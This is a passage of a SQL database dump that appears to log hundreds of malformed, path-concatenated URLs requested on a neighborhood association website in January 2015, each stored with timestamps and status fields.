23:46:08','0000-00-00 00:00:00'),(507,'http://www.hallcrestheights.org//announcements.html/interests.html','','','',1,0,'2015-01-07 23:46:09','0000-00-00 00:00:00'),(508,'http://www.hallcrestheights.org//announcements.html/announcements.html','','','',1,0,'2015-01-07 23:46:11','0000-00-00 00:00:00'),(509,'http://www.hallcrestheights.org//announcements.html/site-map.html','','','',1,0,'2015-01-07 23:46:12','0000-00-00 00:00:00'),(510,'http://www.hallcrestheights.org//announcements.html/terms-of-service.html','','','',1,0,'2015-01-07 23:46:13','0000-00-00 00:00:00'),(511,'http://www.hallcrestheights.org//announcements.html/privacy-policy.html','','','',1,0,'2015-01-07 23:46:15','0000-00-00 00:00:00'),(512,'http://www.hallcrestheights.org//terms-of-service.html/community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:46:38','0000-00-00 00:00:00'),(513,'http://www.hallcrestheights.org//terms-of-service.html/community/announcements.html','','','',1,0,'2015-01-07 23:46:39','0000-00-00 00:00:00'),(514,'http://www.hallcrestheights.org//terms-of-service.html/community/events.html','','','',1,0,'2015-01-07 23:46:40','0000-00-00 00:00:00'),(515,'http://www.hallcrestheights.org//terms-of-service.html/community/real-estate-guide.html','','','',1,0,'2015-01-07 23:46:42','0000-00-00 00:00:00'),(516,'http://www.hallcrestheights.org//terms-of-service.html/association/about-us.html','','','',1,0,'2015-01-07 23:46:43','0000-00-00 00:00:00'),(517,'http://www.hallcrestheights.org//terms-of-service.html/association/board-members.html','','','',1,0,'2015-01-07 23:46:44','0000-00-00 00:00:00'),(518,'http://www.hallcrestheights.org//terms-of-service.html/association/newsletters.html','','','',1,0,'2015-01-07 23:46:45','0000-00-00 00:00:00'),(519,'http://www.hallcrestheights.org//terms-of-service.html/interests.html','','','',1,0,'2015-01-07 23:46:47','0000-00-00 00:00:00'),(520,'http://www.hallcrestheights.org//terms-of-service.html/terms-of-service.html','','','',1,0,'2015-01-07 23:46:48','0000-00-00 00:00:00'),(521,'http://www.hallcrestheights.org//terms-of-service.html/privacy-policy.html','','','',1,0,'2015-01-07 23:46:49','0000-00-00 00:00:00'),(522,'http://www.hallcrestheights.org//terms-of-service.html/site-map.html','','','',1,0,'2015-01-07 23:46:51','0000-00-00 00:00:00'),(523,'http://www.hallcrestheights.org//privacy-policy.html/community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:46:53','0000-00-00 00:00:00'),(524,'http://www.hallcrestheights.org//privacy-policy.html/community/announcements.html','','','',1,0,'2015-01-07 23:46:55','0000-00-00 00:00:00'),(525,'http://www.hallcrestheights.org//privacy-policy.html/community/events.html','','','',1,0,'2015-01-07 23:46:56','0000-00-00 00:00:00'),(526,'http://www.hallcrestheights.org//privacy-policy.html/community/real-estate-guide.html','','','',1,0,'2015-01-07 23:46:57','0000-00-00 00:00:00'),(527,'http://www.hallcrestheights.org//privacy-policy.html/association/about-us.html','','','',1,0,'2015-01-07 23:46:59','0000-00-00 00:00:00'),(528,'http://www.hallcrestheights.org//privacy-policy.html/association/board-members.html','','','',1,0,'2015-01-07 23:47:00','0000-00-00 00:00:00'),(529,'http://www.hallcrestheights.org//privacy-policy.html/association/newsletters.html','','','',1,0,'2015-01-07 23:47:02','0000-00-00 00:00:00'),(530,'http://www.hallcrestheights.org//privacy-policy.html/interests.html','','','',1,0,'2015-01-07 23:47:03','0000-00-00 00:00:00'),(531,'http://www.hallcrestheights.org//privacy-policy.html/privacy-policy.html','','','',1,0,'2015-01-07 23:47:04','0000-00-00 00:00:00'),(532,'http://www.hallcrestheights.org//privacy-policy.html/site-map.html','','','',1,0,'2015-01-07 23:47:06','0000-00-00 00:00:00'),(533,'http://www.hallcrestheights.org//privacy-policy.html/terms-of-service.html','','','',1,0,'2015-01-07 23:47:07','0000-00-00 00:00:00'),(534,'http://www.hallcrestheights.org///community/neighborhood-guide.html/community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:47:27','0000-00-00 00:00:00'),(535,'http://www.hallcrestheights.org///community/neighborhood-guide.html/community/announcements.html','','','',1,0,'2015-01-07 23:47:29','0000-00-00 00:00:00'),(536,'http://www.hallcrestheights.org///community/neighborhood-guide.html/community/events.html','','','',1,0,'2015-01-07 23:47:30','0000-00-00 00:00:00'),(537,'http://www.hallcrestheights.org///community/neighborhood-guide.html/community/real-estate-guide.html','','','',1,0,'2015-01-07 23:47:31','0000-00-00 00:00:00'),(538,'http://www.hallcrestheights.org///community/neighborhood-guide.html/association/about-us.html','','','',1,0,'2015-01-07 23:47:32','0000-00-00 00:00:00'),(539,'http://www.hallcrestheights.org///community/neighborhood-guide.html/association/board-members.html','','','',1,0,'2015-01-07 23:47:34','0000-00-00 00:00:00'),(540,'http://www.hallcrestheights.org///community/neighborhood-guide.html/association/newsletters.html','','','',1,0,'2015-01-07 23:47:35','0000-00-00 00:00:00'),(541,'http://www.hallcrestheights.org///community/neighborhood-guide.html/interests.html','','','',1,0,'2015-01-07 23:47:36','0000-00-00 00:00:00'),(542,'http://www.hallcrestheights.org///community/neighborhood-guide.html/announcements.html','','','',1,0,'2015-01-07 23:47:38','0000-00-00 00:00:00'),(543,'http://www.hallcrestheights.org///community/neighborhood-guide.html/site-map.html','','','',1,0,'2015-01-07 23:47:39','0000-00-00 00:00:00'),(544,'http://www.hallcrestheights.org///community/neighborhood-guide.html/terms-of-service.html','','','',1,0,'2015-01-07 23:47:40','0000-00-00 00:00:00'),(545,'http://www.hallcrestheights.org///community/neighborhood-guide.html/privacy-policy.html','','','',1,0,'2015-01-07 23:47:45','0000-00-00 00:00:00'),(546,'http://www.hallcrestheights.org///community/announcements.html/community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:47:47','0000-00-00 00:00:00'),(547,'http://www.hallcrestheights.org///community/announcements.html/community/announcements.html','','','',1,0,'2015-01-07 23:47:49','0000-00-00 00:00:00'),(548,'http://www.hallcrestheights.org///community/announcements.html/community/events.html','','','',1,0,'2015-01-07 23:47:50','0000-00-00 00:00:00'),(549,'http://www.hallcrestheights.org///community/announcements.html/community/real-estate-guide.html','','','',1,0,'2015-01-07 23:47:51','0000-00-00 00:00:00'),(550,'http://www.hallcrestheights.org///community/announcements.html/association/about-us.html','','','',1,0,'2015-01-07 23:47:52','0000-00-00 00:00:00'),(551,'http://www.hallcrestheights.org///community/announcements.html/association/board-members.html','','','',1,0,'2015-01-07 23:47:54','0000-00-00 00:00:00'),(552,'http://www.hallcrestheights.org///community/announcements.html/association/newsletters.html','','','',1,0,'2015-01-07 23:47:55','0000-00-00 00:00:00'),(553,'http://www.hallcrestheights.org///community/announcements.html/interests.html','','','',1,0,'2015-01-07 23:47:56','0000-00-00 00:00:00'),(554,'http://www.hallcrestheights.org///community/announcements.html/announcements.html','','','',1,0,'2015-01-07 23:47:58','0000-00-00 00:00:00'),(555,'http://www.hallcrestheights.org///community/announcements.html/site-map.html','','','',1,0,'2015-01-07 23:47:59','0000-00-00 00:00:00'),(556,'http://www.hallcrestheights.org///community/announcements.html/terms-of-service.html','','','',1,0,'2015-01-07 23:48:00','0000-00-00 00:00:00'),(557,'http://www.hallcrestheights.org///community/announcements.html/privacy-policy.html','','','',1,0,'2015-01-07 23:48:01','0000-00-00 00:00:00'),(558,'http://www.hallcrestheights.org///community/events.html/community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:48:04','0000-00-00 00:00:00'),(559,'http://www.hallcrestheights.org///community/events.html/community/announcements.html','','','',1,0,'2015-01-07 23:48:05','0000-00-00 00:00:00'),(560,'http://www.hallcrestheights.org///community/events.html/community/events.html','','','',1,0,'2015-01-07 23:48:07','0000-00-00 00:00:00'),(561,'http://www.hallcrestheights.org///community/events.html/community/real-estate-guide.html','','','',1,0,'2015-01-07 23:48:08','0000-00-00 00:00:00'),(562,'http://www.hallcrestheights.org///community/events.html/association/about-us.html','','','',1,0,'2015-01-07 23:48:10','0000-00-00 00:00:00'),(563,'http://www.hallcrestheights.org///community/events.html/association/board-members.html','','','',1,0,'2015-01-07 23:48:11','0000-00-00 00:00:00'),(564,'http://www.hallcrestheights.org///community/events.html/association/newsletters.html','','','',1,0,'2015-01-07 23:48:13','0000-00-00 00:00:00'),(565,'http://www.hallcrestheights.org///community/events.html/interests.html','','','',1,0,'2015-01-07 23:48:14','0000-00-00 00:00:00'),(566,'http://www.hallcrestheights.org///community/events.html/announcements.html','','','',1,0,'2015-01-07 23:48:16','0000-00-00 00:00:00'),(567,'http://www.hallcrestheights.org///community/events.html/site-map.html','','','',1,0,'2015-01-07 23:48:18','0000-00-00 00:00:00'),(568,'http://www.hallcrestheights.org///community/events.html/terms-of-service.html','','','',1,0,'2015-01-07 23:48:19','0000-00-00 00:00:00'),(569,'http://www.hallcrestheights.org///community/events.html/privacy-policy.html','','','',1,0,'2015-01-07 23:48:20','0000-00-00 00:00:00'),(570,'http://www.hallcrestheights.org///community/real-estate-guide.html/community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:48:23','0000-00-00 00:00:00'),(571,'http://www.hallcrestheights.org///community/real-estate-guide.html/community/announcements.html','','','',1,0,'2015-01-07 23:48:25','0000-00-00 00:00:00'),(572,'http://www.hallcrestheights.org///community/real-estate-guide.html/community/events.html','','','',1,0,'2015-01-07 23:48:26','0000-00-00 00:00:00'),(573,'http://www.hallcrestheights.org///community/real-estate-guide.html/community/real-estate-guide.html','','','',1,0,'2015-01-07 23:48:27','0000-00-00 00:00:00'),(574,'http://www.hallcrestheights.org///community/real-estate-guide.html/association/about-us.html','','','',1,0,'2015-01-07 23:48:28','0000-00-00 00:00:00'),(575,'http://www.hallcrestheights.org///community/real-estate-guide.html/association/board-members.html','','','',1,0,'2015-01-07 23:48:30','0000-00-00 00:00:00'),(576,'http://www.hallcrestheights.org///community/real-estate-guide.html/association/newsletters.html','','','',1,0,'2015-01-07 23:48:31','0000-00-00 00:00:00'),(577,'http://www.hallcrestheights.org///community/real-estate-guide.html/interests.html','','','',1,0,'2015-01-07 23:48:32','0000-00-00 00:00:00'),(578,'http://www.hallcrestheights.org///community/real-estate-guide.html/site-map.html','','','',1,0,'2015-01-07 23:48:34','0000-00-00 00:00:00'),(579,'http://www.hallcrestheights.org///community/real-estate-guide.html/terms-of-service.html','','','',1,0,'2015-01-07 23:48:35','0000-00-00 00:00:00'),(580,'http://www.hallcrestheights.org///community/real-estate-guide.html/privacy-policy.html','','','',1,0,'2015-01-07 23:48:36','0000-00-00 00:00:00'),(581,'http://www.hallcrestheights.org///association/about-us.html/community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:48:39','0000-00-00 00:00:00'),(582,'http://www.hallcrestheights.org///association/about-us.html/community/announcements.html','','','',1,0,'2015-01-07 23:48:40','0000-00-00 00:00:00'),(583,'http://www.hallcrestheights.org///association/about-us.html/community/events.html','','','',1,0,'2015-01-07 23:48:42','0000-00-00 00:00:00'),(584,'http://www.hallcrestheights.org///association/about-us.html/community/real-estate-guide.html','','','',1,0,'2015-01-07 23:48:43','0000-00-00 00:00:00'),(585,'http://www.hallcrestheights.org///association/about-us.html/association/about-us.html','','','',1,0,'2015-01-07 23:48:44','0000-00-00 00:00:00'),(586,'http://www.hallcrestheights.org///association/about-us.html/association/board-members.html','','','',1,0,'2015-01-07 23:48:46','0000-00-00 00:00:00'),(587,'http://www.hallcrestheights.org///association/about-us.html/association/newsletters.html','','','',1,0,'2015-01-07 23:48:47','0000-00-00 00:00:00'),(588,'http://www.hallcrestheights.org///association/about-us.html/interests.html','','','',1,0,'2015-01-07 23:48:48','0000-00-00 00:00:00'),(589,'http://www.hallcrestheights.org///association/about-us.html/site-map.html','','','',1,0,'2015-01-07 23:48:49','0000-00-00 00:00:00'),(590,'http://www.hallcrestheights.org///association/about-us.html/terms-of-service.html','','','',1,0,'2015-01-07 23:48:51','0000-00-00 00:00:00'),(591,'http://www.hallcrestheights.org///association/about-us.html/privacy-policy.html','','','',1,0,'2015-01-07 23:48:52','0000-00-00 00:00:00'),(592,'http://www.hallcrestheights.org///association/board-members.html/community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:48:55','0000-00-00 00:00:00'),(593,'http://www.hallcrestheights.org///association/board-members.html/community/announcements.html','','','',1,0,'2015-01-07 23:48:56','0000-00-00 00:00:00'),(594,'http://www.hallcrestheights.org///association/board-members.html/community/events.html','','','',1,0,'2015-01-07 23:48:58','0000-00-00 00:00:00'),(595,'http://www.hallcrestheights.org///association/board-members.html/community/real-estate-guide.html','','','',1,0,'2015-01-07 23:48:59','0000-00-00 00:00:00'),(596,'http://www.hallcrestheights.org///association/board-members.html/association/about-us.html','','','',1,0,'2015-01-07 23:49:00','0000-00-00 00:00:00'),(597,'http://www.hallcrestheights.org///association/board-members.html/association/board-members.html','','','',1,0,'2015-01-07 23:49:01','0000-00-00 00:00:00'),(598,'http://www.hallcrestheights.org///association/board-members.html/association/newsletters.html','','','',1,0,'2015-01-07 23:49:03','0000-00-00 00:00:00'),(599,'http://www.hallcrestheights.org///association/board-members.html/interests.html','','','',1,0,'2015-01-07 23:49:04','0000-00-00 00:00:00'),(600,'http://www.hallcrestheights.org///association/board-members.html/site-map.html','','','',1,0,'2015-01-07 23:49:05','0000-00-00 00:00:00'),(601,'http://www.hallcrestheights.org///association/board-members.html/terms-of-service.html','','','',1,0,'2015-01-07 23:49:07','0000-00-00 00:00:00'),(602,'http://www.hallcrestheights.org///association/board-members.html/privacy-policy.html','','','',1,0,'2015-01-07 23:49:08','0000-00-00 00:00:00'),(603,'http://www.hallcrestheights.org///association/newsletters.html/community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:49:11','0000-00-00 00:00:00'),(604,'http://www.hallcrestheights.org///association/newsletters.html/community/announcements.html','','','',1,0,'2015-01-07 23:49:12','0000-00-00 00:00:00'),(605,'http://www.hallcrestheights.org///association/newsletters.html/community/events.html','','','',1,0,'2015-01-07 23:49:13','0000-00-00 00:00:00'),(606,'http://www.hallcrestheights.org///association/newsletters.html/community/real-estate-guide.html','','','',1,0,'2015-01-07 23:49:15','0000-00-00 00:00:00'),(607,'http://www.hallcrestheights.org///association/newsletters.html/association/about-us.html','','','',1,0,'2015-01-07 23:49:16','0000-00-00 00:00:00'),(608,'http://www.hallcrestheights.org///association/newsletters.html/association/board-members.html','','','',1,0,'2015-01-07 23:49:17','0000-00-00 00:00:00'),(609,'http://www.hallcrestheights.org///association/newsletters.html/association/newsletters.html','','','',1,0,'2015-01-07 23:49:19','0000-00-00 00:00:00'),(610,'http://www.hallcrestheights.org///association/newsletters.html/interests.html','','','',1,0,'2015-01-07 23:49:20','0000-00-00 00:00:00'),(611,'http://www.hallcrestheights.org///association/newsletters.html/site-map.html','','','',1,0,'2015-01-07 23:49:21','0000-00-00 00:00:00'),(612,'http://www.hallcrestheights.org///association/newsletters.html/terms-of-service.html','','','',1,0,'2015-01-07 23:49:22','0000-00-00 00:00:00'),(613,'http://www.hallcrestheights.org///association/newsletters.html/privacy-policy.html','','','',1,0,'2015-01-07 23:49:24','0000-00-00 00:00:00'),(614,'http://www.hallcrestheights.org///interests.html/community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:49:26','0000-00-00 00:00:00'),(615,'http://www.hallcrestheights.org///interests.html/community/announcements.html','','','',1,0,'2015-01-07 23:49:28','0000-00-00 00:00:00'),(616,'http://www.hallcrestheights.org///interests.html/community/events.html','','','',1,0,'2015-01-07 23:49:29','0000-00-00 00:00:00'),(617,'http://www.hallcrestheights.org///interests.html/community/real-estate-guide.html','','','',1,0,'2015-01-07 23:49:30','0000-00-00 00:00:00'),(618,'http://www.hallcrestheights.org///interests.html/association/about-us.html','','','',1,0,'2015-01-07 23:49:32','0000-00-00 00:00:00'),(619,'http://www.hallcrestheights.org///interests.html/association/board-members.html','','','',1,0,'2015-01-07 23:49:33','0000-00-00 00:00:00'),(620,'http://www.hallcrestheights.org///interests.html/association/newsletters.html','','','',1,0,'2015-01-07 23:49:34','0000-00-00 00:00:00'),(621,'http://www.hallcrestheights.org///interests.html/interests.html','','','',1,0,'2015-01-07 23:49:35','0000-00-00 00:00:00'),(622,'http://www.hallcrestheights.org///interests.html/site-map.html','','','',1,0,'2015-01-07 23:49:42','0000-00-00 00:00:00'),(623,'http://www.hallcrestheights.org///interests.html/terms-of-service.html','','','',1,0,'2015-01-07 23:49:43','0000-00-00 00:00:00'),(624,'http://www.hallcrestheights.org///interests.html/privacy-policy.html','','','',1,0,'2015-01-07 23:49:45','0000-00-00 00:00:00'),(625,'http://www.hallcrestheights.org///announcements.html/community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:49:47','0000-00-00 00:00:00'),(626,'http://www.hallcrestheights.org///announcements.html/community/announcements.html','','','',1,0,'2015-01-07 23:49:49','0000-00-00 00:00:00'),(627,'http://www.hallcrestheights.org///announcements.html/community/events.html','','','',1,0,'2015-01-07 23:49:50','0000-00-00 00:00:00'),(628,'http://www.hallcrestheights.org///announcements.html/community/real-estate-guide.html','','','',1,0,'2015-01-07 23:49:51','0000-00-00 00:00:00'),(629,'http://www.hallcrestheights.org///announcements.html/association/about-us.html','','','',1,0,'2015-01-07 23:49:53','0000-00-00 00:00:00'),(630,'http://www.hallcrestheights.org///announcements.html/association/board-members.html','','','',1,0,'2015-01-07 23:49:54','0000-00-00 00:00:00'),(631,'http://www.hallcrestheights.org///announcements.html/association/newsletters.html','','','',1,0,'2015-01-07 23:49:55','0000-00-00 00:00:00'),(632,'http://www.hallcrestheights.org///announcements.html/interests.html','','','',1,0,'2015-01-07 23:49:56','0000-00-00 00:00:00'),(633,'http://www.hallcrestheights.org///announcements.html/announcements.html','','','',1,0,'2015-01-07 23:49:58','0000-00-00 00:00:00'),(634,'http://www.hallcrestheights.org///announcements.html/site-map.html','','','',1,0,'2015-01-07 23:49:59','0000-00-00 00:00:00'),(635,'http://www.hallcrestheights.org///announcements.html/terms-of-service.html','','','',1,0,'2015-01-07 23:50:01','0000-00-00 00:00:00'),(636,'http://www.hallcrestheights.org///announcements.html/privacy-policy.html','','','',1,0,'2015-01-07 23:50:02','0000-00-00 00:00:00'),(637,'http://www.hallcrestheights.org///terms-of-service.html/community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:50:26','0000-00-00 00:00:00'),(638,'http://www.hallcrestheights.org///terms-of-service.html/community/announcements.html','','','',1,0,'2015-01-07 23:50:28','0000-00-00 00:00:00'),(639,'http://www.hallcrestheights.org///terms-of-service.html/community/events.html','','','',1,0,'2015-01-07 23:50:29','0000-00-00 00:00:00'),(640,'http://www.hallcrestheights.org///terms-of-service.html/community/real-estate-guide.html','','','',1,0,'2015-01-07 23:50:30','0000-00-00 00:00:00'),(641,'http://www.hallcrestheights.org///terms-of-service.html/association/about-us.html','','','',1,0,'2015-01-07 23:50:32','0000-00-00 00:00:00'),(642,'http://www.hallcrestheights.org///terms-of-service.html/association/board-members.html','','','',1,0,'2015-01-07 23:50:33','0000-00-00 00:00:00'),(643,'http://www.hallcrestheights.org///terms-of-service.html/association/newsletters.html','','','',1,0,'2015-01-07 23:50:34','0000-00-00 00:00:00'),(644,'http://www.hallcrestheights.org///terms-of-service.html/interests.html','','','',1,0,'2015-01-07 23:50:36','0000-00-00 00:00:00'),(645,'http://www.hallcrestheights.org///terms-of-service.html/terms-of-service.html','','','',1,0,'2015-01-07 23:50:37','0000-00-00 00:00:00'),(646,'http://www.hallcrestheights.org///terms-of-service.html/privacy-policy.html','','','',1,0,'2015-01-07 23:50:39','0000-00-00 00:00:00'),(647,'http://www.hallcrestheights.org///terms-of-service.html/site-map.html','','','',1,0,'2015-01-07 23:50:40','0000-00-00 00:00:00'),(648,'http://www.hallcrestheights.org///privacy-policy.html/community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:50:43','0000-00-00 00:00:00'),(649,'http://www.hallcrestheights.org///privacy-policy.html/community/announcements.html','','','',1,0,'2015-01-07 23:50:44','0000-00-00 00:00:00'),(650,'http://www.hallcrestheights.org///privacy-policy.html/community/events.html','','','',1,0,'2015-01-07 23:50:45','0000-00-00 00:00:00'),(651,'http://www.hallcrestheights.org///privacy-policy.html/community/real-estate-guide.html','','','',1,0,'2015-01-07 23:50:47','0000-00-00 00:00:00'),(652,'http://www.hallcrestheights.org///privacy-policy.html/association/about-us.html','','','',1,0,'2015-01-07 23:50:48','0000-00-00 00:00:00'),(653,'http://www.hallcrestheights.org///privacy-policy.html/association/board-members.html','','','',1,0,'2015-01-07 23:50:49','0000-00-00 00:00:00'),(654,'http://www.hallcrestheights.org///privacy-policy.html/association/newsletters.html','','','',1,0,'2015-01-07 23:50:51','0000-00-00 00:00:00'),(655,'http://www.hallcrestheights.org///privacy-policy.html/interests.html','','','',1,0,'2015-01-07 23:50:52','0000-00-00 00:00:00'),(656,'http://www.hallcrestheights.org///privacy-policy.html/privacy-policy.html','','','',1,0,'2015-01-07 23:50:53','0000-00-00 00:00:00'),(657,'http://www.hallcrestheights.org///privacy-policy.html/site-map.html','','','',1,0,'2015-01-07 23:50:54','0000-00-00 00:00:00'),(658,'http://www.hallcrestheights.org///privacy-policy.html/terms-of-service.html','','','',1,0,'2015-01-07 23:50:56','0000-00-00 00:00:00'),(659,'http://www.hallcrestheights.org//community/neighborhood-guide.html//community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:50:58','0000-00-00 00:00:00'),(660,'http://www.hallcrestheights.org//community/neighborhood-guide.html//community/announcements.html','','','',1,0,'2015-01-07 23:51:00','0000-00-00 00:00:00'),(661,'http://www.hallcrestheights.org//community/neighborhood-guide.html//community/events.html','','','',1,0,'2015-01-07 23:51:01','0000-00-00 00:00:00'),(662,'http://www.hallcrestheights.org//community/neighborhood-guide.html//community/real-estate-guide.html','','','',1,0,'2015-01-07 23:51:02','0000-00-00 00:00:00'),(663,'http://www.hallcrestheights.org//community/neighborhood-guide.html//association/about-us.html','','','',1,0,'2015-01-07 23:51:04','0000-00-00 00:00:00'),(664,'http://www.hallcrestheights.org//community/neighborhood-guide.html//association/board-members.html','','','',1,0,'2015-01-07 23:51:05','0000-00-00 00:00:00'),(665,'http://www.hallcrestheights.org//community/neighborhood-guide.html//association/newsletters.html','','','',1,0,'2015-01-07 23:51:06','0000-00-00 00:00:00'),(666,'http://www.hallcrestheights.org//community/neighborhood-guide.html//interests.html','','','',1,0,'2015-01-07 23:51:08','0000-00-00 00:00:00'),(667,'http://www.hallcrestheights.org//community/neighborhood-guide.html//announcements.html','','','',1,0,'2015-01-07 23:51:09','0000-00-00 00:00:00'),(668,'http://www.hallcrestheights.org//community/neighborhood-guide.html//site-map.html','','','',1,0,'2015-01-07 23:51:10','0000-00-00 00:00:00'),(669,'http://www.hallcrestheights.org//community/neighborhood-guide.html//terms-of-service.html','','','',1,0,'2015-01-07 23:51:12','0000-00-00 00:00:00'),(670,'http://www.hallcrestheights.org//community/neighborhood-guide.html//privacy-policy.html','','','',1,0,'2015-01-07 23:51:13','0000-00-00 00:00:00'),(671,'http://www.hallcrestheights.org//community/announcements.html//community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:51:17','0000-00-00 00:00:00'),(672,'http://www.hallcrestheights.org//community/announcements.html//community/announcements.html','','','',1,0,'2015-01-07 23:51:18','0000-00-00 00:00:00'),(673,'http://www.hallcrestheights.org//community/announcements.html//community/events.html','','','',1,0,'2015-01-07 23:51:19','0000-00-00 00:00:00'),(674,'http://www.hallcrestheights.org//community/announcements.html//community/real-estate-guide.html','','','',1,0,'2015-01-07 23:51:21','0000-00-00 00:00:00'),(675,'http://www.hallcrestheights.org//community/announcements.html//association/about-us.html','','','',1,0,'2015-01-07 23:51:22','0000-00-00 00:00:00'),(676,'http://www.hallcrestheights.org//community/announcements.html//association/board-members.html','','','',1,0,'2015-01-07 23:51:24','0000-00-00 00:00:00'),(677,'http://www.hallcrestheights.org//community/announcements.html//association/newsletters.html','','','',1,0,'2015-01-07 23:51:25','0000-00-00 00:00:00'),(678,'http://www.hallcrestheights.org//community/announcements.html//interests.html','','','',1,0,'2015-01-07 23:51:26','0000-00-00 00:00:00'),(679,'http://www.hallcrestheights.org//community/announcements.html//announcements.html','','','',1,0,'2015-01-07 23:51:27','0000-00-00 00:00:00'),(680,'http://www.hallcrestheights.org//community/announcements.html//site-map.html','','','',1,0,'2015-01-07 23:51:29','0000-00-00 00:00:00'),(681,'http://www.hallcrestheights.org//community/announcements.html//terms-of-service.html','','','',1,0,'2015-01-07 23:51:30','0000-00-00 00:00:00'),(682,'http://www.hallcrestheights.org//community/announcements.html//privacy-policy.html','','','',1,0,'2015-01-07 23:51:31','0000-00-00 00:00:00'),(683,'http://www.hallcrestheights.org//community/events.html//community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:51:34','0000-00-00 00:00:00'),(684,'http://www.hallcrestheights.org//community/events.html//community/announcements.html','','','',1,0,'2015-01-07 23:51:35','0000-00-00 00:00:00'),(685,'http://www.hallcrestheights.org//community/events.html//community/events.html','','','',1,0,'2015-01-07 23:51:37','0000-00-00 00:00:00'),(686,'http://www.hallcrestheights.org//community/events.html//community/real-estate-guide.html','','','',1,0,'2015-01-07 23:51:38','0000-00-00 00:00:00'),(687,'http://www.hallcrestheights.org//community/events.html//association/about-us.html','','','',1,0,'2015-01-07 23:51:39','0000-00-00 00:00:00'),(688,'http://www.hallcrestheights.org//community/events.html//association/board-members.html','','','',1,0,'2015-01-07 23:51:40','0000-00-00 00:00:00'),(689,'http://www.hallcrestheights.org//community/events.html//association/newsletters.html','','','',1,0,'2015-01-07 23:51:42','0000-00-00 00:00:00'),(690,'http://www.hallcrestheights.org//community/events.html//interests.html','','','',1,0,'2015-01-07 23:51:43','0000-00-00 00:00:00'),(691,'http://www.hallcrestheights.org//community/events.html//announcements.html','','','',1,0,'2015-01-07 23:51:45','0000-00-00 00:00:00'),(692,'http://www.hallcrestheights.org//community/events.html//site-map.html','','','',1,0,'2015-01-07 23:51:47','0000-00-00 00:00:00'),(693,'http://www.hallcrestheights.org//community/events.html//terms-of-service.html','','','',1,0,'2015-01-07 23:51:48','0000-00-00 00:00:00'),(694,'http://www.hallcrestheights.org//community/events.html//privacy-policy.html','','','',1,0,'2015-01-07 23:51:50','0000-00-00 00:00:00'),(695,'http://www.hallcrestheights.org//community/real-estate-guide.html//community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:51:52','0000-00-00 00:00:00'),(696,'http://www.hallcrestheights.org//community/real-estate-guide.html//community/announcements.html','','','',1,0,'2015-01-07 23:51:53','0000-00-00 00:00:00'),(697,'http://www.hallcrestheights.org//community/real-estate-guide.html//community/events.html','','','',1,0,'2015-01-07 23:51:55','0000-00-00 00:00:00'),(698,'http://www.hallcrestheights.org//community/real-estate-guide.html//community/real-estate-guide.html','','','',1,0,'2015-01-07 23:51:56','0000-00-00 00:00:00'),(699,'http://www.hallcrestheights.org//community/real-estate-guide.html//association/about-us.html','','','',1,0,'2015-01-07 23:51:58','0000-00-00 00:00:00'),(700,'http://www.hallcrestheights.org//community/real-estate-guide.html//association/board-members.html','','','',1,0,'2015-01-07 23:51:59','0000-00-00 00:00:00'),(701,'http://www.hallcrestheights.org//community/real-estate-guide.html//association/newsletters.html','','','',1,0,'2015-01-07 23:52:00','0000-00-00 00:00:00'),(702,'http://www.hallcrestheights.org//community/real-estate-guide.html//interests.html','','','',1,0,'2015-01-07 23:52:02','0000-00-00 00:00:00'),(703,'http://www.hallcrestheights.org//community/real-estate-guide.html//site-map.html','','','',1,0,'2015-01-07 23:52:03','0000-00-00 00:00:00'),(704,'http://www.hallcrestheights.org//community/real-estate-guide.html//terms-of-service.html','','','',1,0,'2015-01-07 23:52:04','0000-00-00 00:00:00'),(705,'http://www.hallcrestheights.org//community/real-estate-guide.html//privacy-policy.html','','','',1,0,'2015-01-07 23:52:06','0000-00-00 00:00:00'),(706,'http://www.hallcrestheights.org//association/about-us.html//community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:52:08','0000-00-00 00:00:00'),(707,'http://www.hallcrestheights.org//association/about-us.html//community/announcements.html','','','',1,0,'2015-01-07 23:52:10','0000-00-00 00:00:00'),(708,'http://www.hallcrestheights.org//association/about-us.html//community/events.html','','','',1,0,'2015-01-07 23:52:11','0000-00-00 00:00:00'),(709,'http://www.hallcrestheights.org//association/about-us.html//community/real-estate-guide.html','','','',1,0,'2015-01-07 23:52:12','0000-00-00 00:00:00'),(710,'http://www.hallcrestheights.org//association/about-us.html//association/about-us.html','','','',1,0,'2015-01-07 23:52:14','0000-00-00 00:00:00'),(711,'http://www.hallcrestheights.org//association/about-us.html//association/board-members.html','','','',1,0,'2015-01-07 23:52:15','0000-00-00 00:00:00'),(712,'http://www.hallcrestheights.org//association/about-us.html//association/newsletters.html','','','',1,0,'2015-01-07 23:52:16','0000-00-00 00:00:00'),(713,'http://www.hallcrestheights.org//association/about-us.html//interests.html','','','',1,0,'2015-01-07 23:52:18','0000-00-00 00:00:00'),(714,'http://www.hallcrestheights.org//association/about-us.html//site-map.html','','','',1,0,'2015-01-07 23:52:19','0000-00-00 00:00:00'),(715,'http://www.hallcrestheights.org//association/about-us.html//terms-of-service.html','','','',1,0,'2015-01-07 23:52:20','0000-00-00 00:00:00'),(716,'http://www.hallcrestheights.org//association/about-us.html//privacy-policy.html','','','',1,0,'2015-01-07 23:52:22','0000-00-00 00:00:00'),(717,'http://www.hallcrestheights.org//association/board-members.html//community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:52:24','0000-00-00 00:00:00'),(718,'http://www.hallcrestheights.org//association/board-members.html//community/announcements.html','','','',1,0,'2015-01-07 23:52:26','0000-00-00 00:00:00'),(719,'http://www.hallcrestheights.org//association/board-members.html//community/events.html','','','',1,0,'2015-01-07 23:52:27','0000-00-00 00:00:00'),(720,'http://www.hallcrestheights.org//association/board-members.html//community/real-estate-guide.html','','','',1,0,'2015-01-07 